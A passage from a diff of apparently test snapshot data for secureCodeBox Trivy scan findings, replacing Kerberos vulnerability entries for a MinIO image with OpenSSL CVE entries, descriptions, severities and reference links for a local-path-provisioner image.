"LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.openssl.org/news/secadv/20230322.txt", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", + ], + }, + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": 